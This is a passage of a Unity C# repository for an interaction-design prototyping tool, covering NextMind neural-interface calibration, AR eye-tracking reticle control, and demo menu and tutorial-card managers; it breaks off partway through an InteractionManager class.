<AppleCareImage size={appleCareImageSize} />
</div>
<div className='page-title-container'>
<PageTitle title={messages.title} subheading={messages.subhead} />
</div>
<div className='go-to-mysupport content-area'>
<NavigationLink />
</div>
</CSSTransitionGroup>
);
};
export default AgreementConfirmation;
<file_sep>/src/components/ActivityList/__stories__/ActivityList.js
import React from 'react';
import { storiesOf } from '@storybook/react';
import { action } from '@storybook/addon-actions';
import ActivityList from '../ActivityList';
import ACTIVITY_DATA from '../../../__mock__/activity-list.json';
storiesOf('Activity List', module)
.add('Initial State', () => (
<ActivityList activities={ACTIVITY_DATA} maxItemsToShow={12} onShowMoreClick={action('Show more clicked')} />
))
.add('More Items Shown', () => (
<ActivityList
maxItemsToShow={12}
onShowMoreClick={action('Show more clicked')}
activities={Object.assign({}, ACTIVITY_DATA, { showMoreActivities: true })}
/>
));
<file_sep>/src/routes/ShippingLabel/components/ShippingLabel.js
import PropTypes from 'prop-types';
import React from 'react';
import { FormattedHTMLMessage } from 'react-intl';
import Address from '../../../components/Address';
import { shippingLabel as messages } from '../../../messages/messages';
import HEADING_IMAGE from './images/eParcel_header.jpg';
import './ShippingLabel.scss';
/**
* creates barcode image
*/
const getBarcodeImage = imageData => {
if (imageData) {
return (<img src={`data:image/gif;base64,${imageData}`} alt='' className='barcode' />);
}
return (<span className='barcode'>barcode loading ...</span>);
};
/**
* Component defining the route for displaying shipping Label
* @param {Object} barcodeData
* @param {Object} shippingAddress
* @param {Object} returnAddress
* @param {String} dispatchId
* @param {func} trackPageView
* @returns {XML}
* @constructor
*/
const ShippingLabel = props => {
// send omniture page load event
props.trackPageView();
return (
<div className='shipping-label-wrapper'>
<div className='shipping-label-instructions'>
<FormattedHTMLMessage {...messages.instructions} />
</div>
<div className='shipping-label'>
<div className='header'>
<img alt='' src={HEADING_IMAGE} />
<h1 className='header-main'>eParcel POST RETURNS</h1>
<h2 className='header-sub'>For Post Office Use: Scan Barcode. No Payment Required.</h2>
</div>
<div className='post-to-address'>
<div className='header-send-to'>DELIVERY TO</div>
<Address {...props.shippingAddress} />
</div>
<div className='delivery-instuction-head text-5'>DELIVERY INSTRUCTIONS</div>
<div className='delivery-instuction-body text-6'>
DELIVER THE PACKAGE TO THE RECEIVING DOCK, PLEASE RING THE BELL FOR ATTENDANCE.
DO NOT LEAVE THE PACKAGE UNATTENDED
</div>
<div className='signature-block'>
<div className=''>SIGNATURE ON DELIVERY REQUIRED  PARCEL 1 OF 1</div>
</div>
<div className='barcode-wrapper'>
<div className='articleId'>AP Article Id: {props.barcodeData.articleId}</div>
<div className='barcode-image'>{getBarcodeImage(props.barcodeData.barcodeImage)}</div>
<div className='articleId'>AP Article Id: {props.barcodeData.articleId}</div>
</div>
<div className='post-from-address'>
<div className='text-5'>SENDER</div>
<div className='dispatchId'>{props.dispatchId}</div>
<Address {...props.returnAddress} />
</div>
</div>
<div className='shipping-label-notes'>
<FormattedHTMLMessage {...messages.notes} />
</div>
</div>
);
};
ShippingLabel.propTypes = {
barcodeData: PropTypes.object.isRequired,
dispatchId: PropTypes.string.isRequired,
shippingAddress: PropTypes.object.isRequired,
returnAddress: PropTypes.object,
trackPageView: PropTypes.func.isRequired
};
export default ShippingLabel;
<file_sep>/src/containers/AppContainer.js
import PropTypes from 'prop-types';
import React, { Component } from 'react';
import { browserHistory, Router } from 'react-router';
import { Provider } from 'react-intl-redux'; // Wraps the IntlProvider of react-intl with the Provider for react-redux
/**
* Main container wrapping all routes and components
* @param {Object} routes
* @param {Object} store
* @returns {XML}
* @class
*/
class AppContainer extends Component {
static propTypes = {
routes: PropTypes.object.isRequired,
store: PropTypes.object.isRequired
};
shouldComponentUpdate() {
return false;
}
render() {
const { routes, store } = this.props;
return (
<Provider store={store}>
<div className='app-root'>
<Router onUpdate={() => window.scrollTo(0, 0)} history={browserHistory} >
{routes}
</Router>
</div>
</Provider>
);
}
}
export default AppContainer;
<file_sep>/src/layouts/BasicLayout/components/BasicLayout.js
import PropTypes from 'prop-types';
import React from 'react';
import GlobalFooter from '../../../components/GlobalFooter';
import './BasicLayout.scss';
/**
* Layout that only renders the provided content and Global Footer. Mainly used for error pages
* @param children
* @constructor
*/
const BasicLayout = ({ children }) => (
<div className='container text-center'>
<div className='basic-layout__viewport'>
{children}
</div>
<GlobalFooter returnUrl={location.pathname} />
</div>
);
BasicLayout.propTypes = {
children: PropTypes.element.isRequired
};
export default BasicLayout;
<file_sep>/src/components/CoverageList/index.js
import CoverageList from './CoverageList';
export default CoverageList;
<file_sep>/src/components/ActivityItem/ActivityItem.js
import React from 'react';
import PropTypes from 'prop-types';
import FormattedText from '../FormattedText';
import { itemDescription, isNotificationItem } from '../../services/notificationService';
import { EXIT_EVENT, EXIT_EVENT_VALUES } from '../../metrics/AnalyticsService';
import { activityItem as messages } from '../../messages/messages';
import './ActivityItem.scss';
/**
* Display a single activity item
* @param {Object} activityData - Data related to the current activity
* @param {string} [className=''] - Additional class names to use for the activity item
* @param {string} [id=''] - Id to use for the activity item
* @param {boolean} [allActivities=false] - If the current page is All Activity or not
* @returns {XML}
* @constructor
*/
const ActivityItem = ({ activityData, className, id, allActivities }) => {
const prodName = activityData.product && activityData.product.productName;
const caseTitle = prodName
? (`${prodName}: ${activityData.caseTitle}`)
: activityData.caseTitle;
const activityTitle = allActivities
? (<h2 className='activity-header'>
{caseTitle}
</h2>)
: (<h3 className='activity-header'>
{caseTitle}
</h3>);
return (
<div id={id} className={`activity-item ${className}`}>
<div className='activity-header-row'>
{activityTitle}
</div>
{activityData.solutions.map((solution, i) => {
const solutionId = solution.solutionId;
const linkId = `al-${solutionId}-${i}`;
const a11yId = `aa-${solutionId}-${i}`;
const iconClass = isNotificationItem(solution) // eslint-disable-line no-nested-ternary
? (solution.hasAlert
? `has-alert ${solution.solutionSubType}`
: solution.solutionSubType)
: '';
const seeDetailsLink = (solution.solutionSubType === 'OtherRepair')
? (<a
className='notification-link icon icon-after icon-chevronright'
href={`/repairs/details/${solution.repairId}`}
>
<span
role='text' // eslint-disable-line jsx-a11y/aria-role
>
<FormattedText {...messages.seeDetails} />
<span className='a11y'>{caseTitle}</span>
</span>
</a>)
: (<a
target='_blank'
aria-labelledby={`${linkId} ${a11yId} new-window`}
className='notification-link icon icon-after icon-chevronright'
data-metrics-event-name={EXIT_EVENT}
data-metrics-event-value={EXIT_EVENT_VALUES.cas}
href={solution.redirectUrl}
>
<span
role='text' // eslint-disable-line jsx-a11y/aria-role
>
<FormattedText htmlId={linkId} {...messages.seeDetails} />
<span id={a11yId} className='a11y'>{caseTitle}</span>
</span>
</a>);
return (
<div key={solutionId} className='activity-item-row'>
<div className='activity-details'>
<div className='left-col'>
<span className={`icon ${iconClass}`} />
<div className='activity-subheader'>
{solution.solutionTitle}
</div>
{itemDescription(solution, 'activity')}
</div>
<div className='right-col activity-link-wrapper'>
{seeDetailsLink}
</div>
</div>
</div>
);
})}
</div>
);
};
ActivityItem.propTypes = {
activityData: PropTypes.object.isRequired,
className: PropTypes.string,
id: PropTypes.string,
allActivities: PropTypes.bool
};
ActivityItem.defaultProps = {
className: '',
id: '',
allActivities: false
};
export default ActivityItem;
<file_sep>/src/routes/ShippingLabel/index.js
/* eslint-disable global-require */
import { injectReducer } from 'store/reducers';
export default store => ({
path: '/repairs/shippingLabel/dispatchId/:dispatchId',
/* Async getComponent is only invoked when route matches */
getComponent(nextState, callback) {
/*
* Webpack - use import() to create a split point and embed
* an async module loader (jsonp) when bundling
*/
return import(/* webpackChunkName: "shipping-label" */ './containers/ShippingLabelContainer')
.then(ShippingLabel => {
const shippingLabelReducer = require('../../modules/shippinglabel').default;
/* Add the reducer to the store on key 'shippingLabelData' */
injectReducer(store, {
key: 'shippingLabelData',
reducer: shippingLabelReducer
});
return callback(null, ShippingLabel.default);
})
.catch(err => {
console.error('Dynamic page loading of shipping label failed. ', err);
});
}
});
<file_sep>/src/modules/shippinglabel.js
/**
* Redux actions and handlers related to shipping label
* @module proofofcoverage
*/
import { metrics } from '../metrics/AnalyticsService';
/**
* Constants
*/
export const SHIPPING_LABEL_DATA_LOADED = 'SHIPPING_LABEL_DATA_LOADED';
/**
* Actions
*/
const shippingLabelDataLoaded = (data = {}) => ({
type: SHIPPING_LABEL_DATA_LOADED,
payload: data
});
export const actions = {
shippingLabelDataLoaded
};
/**
* Action Handlers
*/
const ACTION_HANDLERS = {
[SHIPPING_LABEL_DATA_LOADED]: (state = {}, action) => (action.payload ? action.payload : state)
};
/**
* send a page load omniture event
*/
export const trackPageView = () => {
metrics.trackPage({
page: {
content_subtype: 'AUS_Post_Label_Load'
}
});
};
/**
* Reducers
*/
export const initialState = {
barcodeData: {},
dispatchId: '',
shippingAddress: {},
returnAddress: {}
};
const reducer = (state = initialState, action) => {
const handler = ACTION_HANDLERS[action.type];
return handler ? handler(state, action) : state;
};
export default reducer;
<file_sep>/src/components/CoverageList/CoverageList.js
import React from 'react';
import PropTypes from 'prop-types';
import { FormattedMessage, FormattedHTMLMessage } from 'react-intl';
import { isEmpty } from 'lodash';
import CoverageItem from '../CoverageItem';
import { coverageList as messages } from '../../messages/messages';
import './CoverageList.scss';
/**
* Renders all coverage items for a given product. Used in product details page
* @param {Object} coverage - Object with data on coverage specific to the given product
* @param {Function} [onMount] - Function to be run on initial mount
* @param {Function} onViewPOCClick - Handler for when user clicks on button to view their POC
* @param {Object} userData - Redux object containing current user data
* @param {Object} device - Contains data for the current device
* @param {number} deviceIndex - Index of the current device in the product list
* @param {string} agreementsUrl - Url to deep dive to agreement sales
* @returns {XML}
* @class
*/
class CoverageList extends React.Component {
componentDidMount() {
const { onMount } = this.props;
if (onMount) {
onMount();
}
}
render() {
const { coverage, onViewPOCClick, userData, device, deviceIndex,
onExtendCoverageClick, agreementsUrl, onPurchaseAgreementClick } = this.props;
const { isFetching, data } = coverage;
if (isFetching || typeof isFetching === 'undefined') {
return <div className='loading' />;
} else if (data && data.error) {
return (
<div className='coverage-list'>
<div className='no-coverage'>
{data.error}
</div>
</div>
);
} else if (data && !isEmpty(data)) {
const { agreementsEligibility, coverageSummary, purchaseDateInfo, supportCoverage, repairCoverage } = data;
const coverageSection = () => {
if (agreementsEligibility && !isEmpty(agreementsEligibility)) {
return (
<CoverageItem
coverageData={agreementsEligibility}
userData={userData}
onViewPOCClick={onViewPOCClick}
device={device}
deviceIndex={deviceIndex}
onExtendCoverageClick={onExtendCoverageClick}
agreementsUrl={agreementsUrl}
onPurchaseAgreementClick={onPurchaseAgreementClick}
/>
);
} else if (coverageSummary && coverageSummary.type !== 'NONE' && coverageSummary.type !== 'UNKNOWN') {
return (
<CoverageItem
coverageData={coverageSummary}
userData={userData}
onViewPOCClick={onViewPOCClick}
device={device}
deviceIndex={deviceIndex}
onExtendCoverageClick={onExtendCoverageClick}
/>
);
}
return null;
};
return (
<div className='coverage-list'>
{coverageSection()}
{purchaseDateInfo &&
<CoverageItem coverageData={purchaseDateInfo} userData={userData} />
}
{supportCoverage &&
<CoverageItem
coverageData={supportCoverage}
userData={userData}
exitEvent='Product_Details::Exit_to_CAS'
/>
}
{repairCoverage &&
<CoverageItem
coverageData={repairCoverage}
userData={userData}
exitEvent='Product_Details::Exit_to_Set_Up_Repair'
/>
}
<div className='coverage-disclaimer'>
<FormattedHTMLMessage {...messages.disclaimerText} />
</div>
</div>
);
}
return (
<div className='coverage-list'>
<div className='no-coverage'>
<FormattedMessage {...messages.noData} />
</div>
</div>
);
}
}
CoverageList.propTypes = {
coverage: PropTypes.object.isRequired,
onMount: PropTypes.func,
onViewPOCClick: PropTypes.func.isRequired,
onExtendCoverageClick: PropTypes.func.isRequired,
userData: PropTypes.object.isRequired,
device: PropTypes.object.isRequired,
deviceIndex: PropTypes.number.isRequired,
agreementsUrl: PropTypes.string.isRequired,
onPurchaseAgreementClick: PropTypes.func
};
CoverageList.defaultProps = {
onMount: undefined,
onPurchaseAgreementClick: undefined
};
export default CoverageList;
| 921040b81c7b620f1f35840d053d4bdbf59af2d5 | [
"JavaScript"
] | 24 | JavaScript | dheerajui/React | e7579b7f87b728f409ebf7f3956d12d0ae26f6b4 | c4ef53217fd37d00c902b605e9c2dbfc710f2fe9 |
refs/heads/master | <file_sep>export enum musicalInstruments {
drum,
piano,
}
export interface voiceItem {
keyCode: number;
keyTrigger: string;
id: string;
url: string;
}
<file_sep>export default {
//接收一个命名与模板一致的插槽,并生成对应的节点,
render(h) {
let vm = this;
let slotsList = Object.entries(this.$slots);
//根据传入插槽动态生成节点和方法;
let arr = slotsList.map(([key, value]) => {
let nodeOption = {
on: {
click() {
window.open(vm.shareURLData[key], "_blank", "resizable=yes");
},
},
};
//渲染成虚拟dom
return h("div", nodeOption, value);
});
return h("div", arr);
},
data() {
return {
shareTemplate: {
qzone:
"http://sns.qzone.qq.com/cgi-bin/qzshare/cgi_qzshare_onekey?url={{URL}}&title={{TITLE}}&desc={{DESCRIPTION}}&summary={{SUMMARY}}&site={{SOURCE}}&pics={{IMAGE}}",
qq:
'http://connect.qq.com/widget/shareqq/index.html?url={{URL}}&title={{TITLE}}&source={{SOURCE}}&desc={{DESCRIPTION}}&pics={{IMAGE}}&summary="{{SUMMARY}}"',
weibo:
"https://service.weibo.com/share/share.php?url={{URL}}&title={{TITLE}}&pic={{IMAGE}}&appkey={{WEIBOKEY}}",
wechat: "javascript:",
douban:
"http://shuo.douban.com/!service/share?href={{URL}}&name={{TITLE}}&text={{DESCRIPTION}}&image={{IMAGE}}&starid=0&aid=0&style=11",
linkedin:
"http://www.linkedin.com/shareArticle?mini=true&ro=true&title={{TITLE}}&url={{URL}}&summary={{SUMMARY}}&source={{SOURCE}}&armin=armin",
facebook: "https://www.facebook.com/sharer/sharer.php?u={{URL}}",
twitter:
"https://twitter.com/intent/tweet?text={{TITLE}}&url={{URL}}&via={{ORIGIN}}",
},
};
},
props: {
config: {
type: Object,
default() {
return { title: "test", url: "test11", desc: "测试用" };
},
},
},
computed: {
shareURLData() {
let vm = this;
return Object.entries(this.shareTemplate).reduce((acc, [key, value]) => {
acc[key] = value.replace(/\{\{(\w*)\}\}/g, function(match, p1) {
p1 = p1.toLowerCase();
return vm.config[p1] || "none";
});
return acc;
}, {});
},
},
};
<file_sep>const baseUrl = "./exercise";
const randomQuoteMachine = baseUrl + "/random-quote-machine/docs/index.html";
const markdownPreviewer = baseUrl + "/markdown-previewer/docs/index.html";
const drumPiano = baseUrl + "/drum/docs/index.html";
const calculator = baseUrl + "/calculator/docs/index.html";
const pomodoroClock = baseUrl + "/pomodoro-clock/docs/index.html";
export default {
randomQuoteMachine,
markdownPreviewer,
drumPiano,
calculator,
pomodoroClock,
};
<file_sep>import srcData from "./demoSrc";
import { Exercise } from "@/type";
export const exerciseList = Object.entries(srcData).map(
([title, src]) => new Exercise(title, src)
);
<file_sep>import { CalculatorButton, buttonType } from "@/type.ts";
const buttonList: CalculatorButton[] = [];
//计算器第一行
buttonList.push(new CalculatorButton(buttonType[2], "AC", "#AC3939"));
const firstLineButton = ["/", "*"].map(
(item) => new CalculatorButton(buttonType[1], item, "#666")
);
buttonList.push(...firstLineButton);
//计算器第2行
const secondLineButton = ["7", "8", "9"].map(
(item) => new CalculatorButton(buttonType[0], item, "#4D4D4D")
);
buttonList.push(...secondLineButton);
buttonList.push(new CalculatorButton(buttonType[1], "-", "#666"));
//计算器第3行
const thirdLineButton = ["4", "5", "6"].map(
(item) => new CalculatorButton(buttonType[0], item, "#4D4D4D")
);
buttonList.push(...thirdLineButton);
buttonList.push(new CalculatorButton(buttonType[1], "+", "#666"));
//计算器第4行
const fourthButton = ["1", "2", "3"].map(
(item) => new CalculatorButton(buttonType[0], item, "#4D4D4D")
);
buttonList.push(...fourthButton);
buttonList.push(new CalculatorButton(buttonType[3], "=", "#004466"));
//计算器第5行
const fifthButton = ["0", "."].map(
(item) => new CalculatorButton(buttonType[0], item, "#4D4D4D")
);
buttonList.push(...fifthButton);
export { buttonList };
<file_sep>import axios from "axios";
const requestQuote = axios.create({
baseURL: "https://v1.alapi.cn/api",
timeout: 2000,
});
export function getQuote(typeid) {
return requestQuote({
url: "/mingyan",
params: {
typeid,
},
})
.then((result) => {
if (result.status > 199 && result.status < 300) {
return result.data.data;
} else {
console.log("request error");
return false;
}
})
.catch((error) => console.log(error));
}
<file_sep>export class Exercise {
constructor(
readonly title: string,
readonly src: string,
readonly cTime: number = performance.now()
) {}
}
<file_sep>export enum clockState {
isReady,
running,
stopped,
end,
}
export enum clockType {
Session,
Break,
}
export class ClockItem {
readonly type: string;
pastTime: number;
readonly totalTime: number;
protected timer: null | number = null;
protected intervalMs: number = 0;
state: string = clockState[0];
constructor(minute: number, type: number = 0) {
this.type = clockType[type];
this.totalTime = minute * 60 * 1000;
this.pastTime = 0;
}
get remainingTime() {
return this.totalTime - this.pastTime;
}
get clockValue() {
let minute: string | number = Math.floor(this.remainingTime / 1000 / 60);
minute < 10 ? (minute = "0" + minute) : null;
let second: string | number = Math.floor(
(this.remainingTime % 60000) / 1000
);
second < 10 ? (second = "0" + second) : null;
return minute + ":" + second;
}
start() {
this.state = clockState[1];
this.run();
}
protected run() {
this.intervalMs = Date.now(); //初始化
this.timer = setTimeout(() => {
this.pastTime += Date.now() - this.intervalMs; //获取过去了多久把过去的时间加到past-time上
this.pastTime < this.totalTime
? this.run() //循环调用
: (this.state = clockState[3]);
});
}
pause() {
this.state = clockState[2];
this.timer !== null && clearTimeout(this.timer);
}
}
<file_sep>export enum buttonType {
valueButton,
signButton,
ACButton,
computedButton,
}
export class CalculatorButton {
public readonly color: string;
public readonly type: string;
public readonly value: string;
constructor(type: string, value: string, color: string) {
this.color = color;
this.type = type;
this.value = value;
}
}
<file_sep>const path = require("path");
module.exports = {
publicPath: "",
outputDir: "docs",
chainWebpack: (config) => {
config.resolve.alias.set("network", path.resolve(__dirname, "src/network"));
},
};
| c47430ee5933aeb63a301bd425e887218d2312db | [
"JavaScript",
"TypeScript"
] | 10 | TypeScript | YJL626/vueExercise | 39adc88354c00b536b52e450703c6bd0312ce0b3 | 2ff5b1f3fef71af78343665539639cba72bdca0e |
refs/heads/main | <repo_name>atx-barnes/ixd-prototyping-tool<file_sep>/Assets/Scripts/GameManager.cs
using System.Collections;
using System.Collections.Generic;
using UnityEngine;
using System;
using NextMind.Calibration;
using NextMind.Devices;
using NextMind.NeuroTags;
using NextMind;
using TMPro;
public class GameManager : MonoBehaviour {
[SerializeField]
private CalibrationManager CalibrationManager;
[SerializeField]
private GameObject Reticle;
[SerializeField]
private GameObject NeuroTagObject;
[SerializeField]
private GameObject Ball;
[SerializeField]
private float ForceMultiplier = 50;
private Vector3 InitialNeuroTagScale;
private bool CalibrationIsDone = false;
private void Awake() {
InitialNeuroTagScale = NeuroTagObject.transform.localScale;
Cursor.visible = false;
}
private void Start() {
StartCoroutine(StartCalibrationWhenReady());
}
void Update() {
RaycastHit hitReticle;
var rayReticle = Camera.main.ScreenPointToRay(Input.mousePosition);
if (Physics.Raycast(rayReticle, out hitReticle)) {
if (hitReticle.rigidbody != null) {
Reticle.transform.position = new Vector3(hitReticle.point.x, 0.01f, hitReticle.point.z);
}
}
}
private IEnumerator StartCalibrationWhenReady() {
// Waiting for the NeuroManager to be ready
yield return new WaitUntil(NeuroManager.Instance.IsReady);
// Actually start the calibration process.
CalibrationManager.StartCalibration();
// Listen to the incoming results
CalibrationManager.onCalibrationResultsAvailable.AddListener(OnReceivedResults);
}
// Calibration results callback with device and user grade information
private void OnReceivedResults(Device device, CalibrationResults.CalibrationGrade grade) {
Debug.Log($"Received results for {device.Name} with a grade of {grade}");
CalibrationIsDone = true;
ResetNeuroTag();
}
public void AddForce() {
if (CalibrationIsDone) {
RaycastHit hit;
var ray = Camera.main.ScreenPointToRay(Input.mousePosition);
if (Physics.Raycast(ray, out hit)) {
if (hit.rigidbody != null && hit.transform.tag == "ground") {
Vector3 dir = (hit.point - Ball.transform.position).normalized;
Ball.GetComponent<Rigidbody>().AddForceAtPosition(dir * ForceMultiplier, hit.point);
}
}
}
}
public void OnFocusForce() {
AddForce();
}
public void ResetNeuroTag() {
NeuroTagObject.transform.localScale = InitialNeuroTagScale;
Cursor.visible = false;
}
}
<file_sep>/Assets/Scripts/EyeTracker.cs
using System.Collections;
using System.Collections.Generic;
using UnityEngine;
using UnityEngine.XR.ARFoundation;
using UnityEngine.XR.ARSubsystems;
[RequireComponent(typeof(ARFace))]
public class EyeTracker : MonoBehaviour
{
public Vector3 eyeGazePosition;
public bool arEyeTrackingState;
[SerializeField]
private GameObject eyePrefab;
private GameObject eyeLeft;
private GameObject eyeRight;
private ARFace arFace;
private InteractionManager interactionManager;
private float calibrationOffsetX = 0;
private float calibrationOffsetY = 0;
void Awake() {
arFace = this.GetComponent<ARFace>();
}
private void OnEnable() {
ARFaceManager arFaceManager = FindObjectOfType<ARFaceManager>();
interactionManager = FindObjectOfType<InteractionManager>();
if (interactionManager != null) {
interactionManager.CalibrateButton.onClick.AddListener(CalibrateReticleFixationPoint);
interactionManager.eyeTracker = this;
}
//TODO: Fix this
if(arFaceManager != null /* && arFaceManager.subsystem != null && arFaceManager.subsystem.SubsystemDescriptor.supportsEyeTracking*/) {
arFace.updated += OnUpdated;
}
else {
Debug.LogWarningFormat("Eye tracking not support on device");
}
}
private void OnDisable() {
arFace.updated -= OnUpdated;
interactionManager.CalibrateButton.onClick.RemoveListener(CalibrateReticleFixationPoint);
SetVisibility(false);
}
/// <summary>
/// Callback detects any changes that are made to the AR Face data.
/// </summary>
/// <param name="eventArgs"></param>
void OnUpdated(ARFaceUpdatedEventArgs eventArgs) {
if (arFace.leftEye != null && eyeLeft == null) {
eyeLeft = Instantiate(eyePrefab, arFace.leftEye);
eyeLeft.SetActive(false);
}
if (arFace.rightEye != null && eyeRight == null) {
eyeRight = Instantiate(eyePrefab, arFace.rightEye);
eyeRight.SetActive(false);
}
arEyeTrackingState = (arFace.trackingState == TrackingState.Tracking) && (ARSession.state > ARSessionState.Ready);
UpdateScreenReticle();
SetVisibility(arEyeTrackingState);
}
/// <summary>
/// Sets visibility of each eye prefab so they dont show up in the scene after being instantiated.
/// </summary>
/// <param name="isVisible"></param>
private void SetVisibility(bool isVisible) {
if(eyeLeft != null && eyeRight != null) {
eyeLeft.SetActive(isVisible);
eyeRight.SetActive(isVisible);
}
}
/// <summary>
/// Updates the position of the reticle in screen space from the fixation point in world space.
/// </summary>
private void UpdateScreenReticle() {
var fixationInViewSpace = Camera.main.WorldToViewportPoint(arFace.fixationPoint.position);
// The camera texture is mirrored so x and y must be changed to match where the fixation point is in relation to the face.
var mirrorFixationInView = new Vector3(1 - fixationInViewSpace.x, 1 - fixationInViewSpace.y, fixationInViewSpace.z);
if (interactionManager.ScreenReticle != null) {
eyeGazePosition = Camera.main.ViewportToScreenPoint(mirrorFixationInView);
interactionManager.ScreenReticle.anchoredPosition3D = new Vector3((eyeGazePosition.x + calibrationOffsetX) * interactionManager.GazeMovementSlider.value, (eyeGazePosition.y + calibrationOffsetY) * interactionManager.GazeMovementSlider.value, eyeGazePosition.z);
}
}
/// <summary>
/// Calibrates the reticle position relitive to the center of the screen.
/// </summary>
public void CalibrateReticleFixationPoint() {
calibrationOffsetX = -eyeGazePosition.x;
calibrationOffsetY = -eyeGazePosition.y;
}
}<file_sep>/Assets/Scripts/DemoMenuManager.cs
using System.Collections;
using System.Collections.Generic;
using UnityEngine.SceneManagement;
using UnityEngine;
using UnityEngine.UI;
using UnityEngine.Events;
using TMPro;
using System;
[Serializable]
public class Demo {
public string Name;
public string Description;
public string SceneName;
public Sprite IconImage;
public Button DemoMenuButton;
public List<string> TutorialSteps;
}
public class DemoMenuManager : MonoBehaviour {
public TextMeshProUGUI NameTMP;
public TextMeshProUGUI DescriptionTMP;
public TutorialCardManager TutorialCardManager;
public Button StartDemoSceneButton;
public Button ContinueButton;
public Image Icon;
public List<Demo> Demo = new List<Demo>();
private void OnEnable() {
foreach (Demo demo in Demo) {
demo.DemoMenuButton.onClick.AddListener(() => LoadDemoInformation(demo));
}
}
public void LoadDemoInformation(Demo demo) {
Debug.Log("Loading Demo Information...");
NameTMP.text = demo.Name;
DescriptionTMP.text = demo.Description;
Icon.sprite = demo.IconImage;
ContinueButton.onClick.AddListener(() => LoadTutorial(demo));
}
public void LoadTutorial(Demo demo) {
Debug.Log("Loading Tutorial...");
TutorialCardManager.InitializeTutiroialInformation(demo.TutorialSteps);
ContinueButton.onClick.RemoveAllListeners();
StartDemoSceneButton.onClick.AddListener(() => LoadDemoExperience(demo));
}
public void LoadDemoExperience(Demo demo) {
Debug.Log("Loading Scene...");
SceneManager.LoadScene(demo.SceneName);
StartDemoSceneButton.onClick.RemoveAllListeners();
}
private void OnDisable() {
foreach (Demo demo in Demo) {
demo.DemoMenuButton.onClick.RemoveAllListeners();
}
// Remove button listeners
ContinueButton.onClick.RemoveAllListeners();
StartDemoSceneButton.onClick.RemoveAllListeners();
}
}
<file_sep>/Assets/Scripts/NeuroCalibration.cs
using System.Collections;
using System.Collections.Generic;
using UnityEngine;
using System;
using NextMind.Calibration;
using NextMind.Devices;
using NextMind.NeuroTags;
using NextMind;
using TMPro;
public class NeuroCalibration : MonoBehaviour
{
[SerializeField]
private CalibrationManager CalibrationManager;
[SerializeField]
private GameObject NeuroTag;
[SerializeField]
private Animator Animator;
private Vector3 InitialNeuroTagSize;
private bool isCalibrationDone = false;
// Start is called before the first frame update
void Start()
{
Application.targetFrameRate = 90;
StartCoroutine(StartCalibrationWhenReady());
InitialNeuroTagSize = NeuroTag.transform.localScale;
}
private IEnumerator StartCalibrationWhenReady() {
// Waiting for the NeuroManager to be ready
yield return new WaitUntil(NeuroManager.Instance.IsReady);
// Actually start the calibration process.
CalibrationManager.StartCalibration();
Debug.Log("Starting Calibration");
// Listen to the incoming results
CalibrationManager.onCalibrationResultsAvailable.AddListener(OnReceivedResults);
}
// Calibration results callback with device and user grade information
private void OnReceivedResults(Device device, CalibrationResults.CalibrationGrade grade) {
Debug.Log($"Received results for {device.Name} with a grade of {grade}");
NeuroTag.transform.localScale = InitialNeuroTagSize;
isCalibrationDone = true;
}
public void DebugNeuroTag(string text) {
if (isCalibrationDone) {
Debug.Log(text);
}
}
public void SetAnimatorTrigger(string trigger) {
if(isCalibrationDone) {
foreach (AnimatorControllerParameter p in Animator.parameters) {
if (p.type == AnimatorControllerParameterType.Trigger) {
Animator.ResetTrigger(p.name);
}
}
Animator.SetTrigger(trigger);
}
}
}
<file_sep>/Assets/Scripts/TutorialCardManager.cs
using System.Collections;
using System.Collections.Generic;
using UnityEngine;
using UnityEngine.UI;
using System;
using TMPro;
using UnityEngine.Events;
[Serializable]
public class StepGroup {
public List<string> Steps = new List<string>();
}
public class TutorialCardManager : MonoBehaviour
{
public Color EnabledButtonColor;
public Color DisabledButtonColor;
public TextMeshProUGUI BackButton;
public TextMeshProUGUI NextButton;
public GameObject StepsParent;
public GameObject PageIndicatorPrefab;
public Transform PageIndicatorsParent;
private List<StepGroup> StepGroups = new List<StepGroup>();
private List<TextMeshProUGUI> StepsTMP = new List<TextMeshProUGUI>();
private List<GameObject> PageIndicators = new List<GameObject>();
private int index;
private void Awake() {
BackButton = BackButton.GetComponent<TextMeshProUGUI>();
NextButton = NextButton.GetComponent<TextMeshProUGUI>();
// Get references to TMPro text fields
foreach (Transform step in StepsParent.transform) {
StepsTMP.Add(step.GetComponent<TextMeshProUGUI>());
}
}
public void InitializeTutiroialInformation(List<string> steps) {
ResetTutorial();
// Create step groups based on the amount of text fields under the parent object in the hiearchy.
for (int i = 0, x = 0; i < steps.Count; i++) {
if (i % StepsTMP.Count == 0) {
StepGroup stepGroup = new StepGroup();
for (int z = 0; z < StepsTMP.Count; z++, x++) {
if (x < steps.Count) {
// Populate each step group with tutorial content
stepGroup.Steps.Add(steps[x]);
}
}
// Add group to list of step groups for initializing a list of step based on a index value
StepGroups.Add(stepGroup);
}
}
// Create page display indicators per group of steps
foreach (StepGroup group in StepGroups) {
PageIndicators.Add(Instantiate(PageIndicatorPrefab, PageIndicatorsParent));
}
// Inititlize first steps
InitializeGroupSteps(0);
}
// Populate the text fields with steps based on index number param
private void InitializeGroupSteps(int index) {
// Clear out previous content
foreach (TextMeshProUGUI tmp in StepsTMP) {
if(!string.IsNullOrEmpty(tmp.text)) {
tmp.text = string.Empty;
}
}
// Populate text fields from each step group with the steps
for (int i = 0; i < StepGroups[index].Steps.Count; i++) {
StepsTMP[i].text = StepGroups[index].Steps[i];
}
// Turn off indicators
foreach (GameObject indicator in PageIndicators) {
indicator.transform.GetChild(1).gameObject.SetActive(false);
}
// Turn on indicator based on group
PageIndicators[index].transform.GetChild(1).gameObject.SetActive(true);
// Check if the the last steps are initialized
if (index == StepGroups.Count - 1) { NextButton.color = DisabledButtonColor; }
else { NextButton.color = EnabledButtonColor; }
// Check if the the first steps are initialized
if (index == 0) { BackButton.color = DisabledButtonColor; }
else { BackButton.color = EnabledButtonColor; }
}
// Cycle to the next group of steps
public void Next() {
if(index < StepGroups.Count - 1) {
index++;
InitializeGroupSteps(index);
}
}
// Cycle to the previous group of steps
public void Back() {
if(index > 0) {
index--;
InitializeGroupSteps(index);
}
}
// Reset the tutorial meta information
private void ResetTutorial() {
StepGroups.Clear();
PageIndicators.Clear();
index = 0;
// Clear page display indicators
foreach (Transform indicator in PageIndicatorsParent.transform) {
Destroy(indicator.gameObject);
}
}
}
<file_sep>/Assets/Scripts/InteractionManager.cs
using System.Collections;
using System.Collections.Generic;
using UnityEngine;
using UnityEngine.XR.ARFoundation;
using UnityEngine.UI;
using UnityEngine.XR.ARSubsystems;
using TMPro;
[RequireComponent(typeof(ARRaycastManager))]
public class InteractionManager : MonoBehaviour
{
public GameObject WorldTargetPrefab;
